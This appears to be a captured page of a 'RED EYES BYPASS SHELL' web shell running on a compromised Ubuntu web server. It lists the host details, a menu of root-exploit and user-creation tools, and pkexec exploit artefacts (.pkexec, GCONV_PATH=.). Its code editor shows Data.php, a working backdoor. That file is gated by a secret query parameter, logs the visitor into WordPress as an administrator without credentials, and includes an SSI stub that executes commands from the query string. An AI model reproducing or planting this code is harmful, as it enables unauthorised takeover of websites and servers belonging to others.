Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
nurse /
pic /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.red_eyes_root
0
B
-rw-r--r--
Core.php
1.9
KB
-rwxrwxrwx
Data.php
897
B
-rwxrwxrwx
executive2025.png
1.13
MB
-rw-r--r--
googlec4df005bd681dc1d.html
53
B
-rwxrwxrwx
index.php
243.4
KB
-rwxrwxrwx
juiceAgain.php
1021
B
-rwxrwxrwx
process1.jpg
220.02
KB
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
sitemap.xml
493
B
-rwxrwxrwx
wanida.jpg
113.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Data.php
<!--#config errmsg="[ERROR] SSI DISABLED"--> <!--#set var="zero" value="" --> <!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" --> <!--#set var="shl" value="id" --> <!--#else --> <!--#set var="shl" value=$QUERY_STRING_UNESCAPED --> <!--#endif --> <?php if (!isset($_GET['kontol'])) { http_response_code(500); header("HTTP/1.1 500 Internal Server Error"); exit(); } $mr = $_SERVER['DOCUMENT_ROOT']; @chdir($mr); if (file_exists('wp-load.php')) { include 'wp-load.php'; $wp_user_query = new WP_User_Query([ 'role' => 'Administrator', 'number' => 1, 'fields' => 'ID' ]); $results = $wp_user_query->get_results(); if (isset($results[0])) { wp_set_auth_cookie($results[0]); wp_redirect(admin_url()); exit(); } exit('NO ADMIN'); } else { exit('Failed to load'); } ?>
Close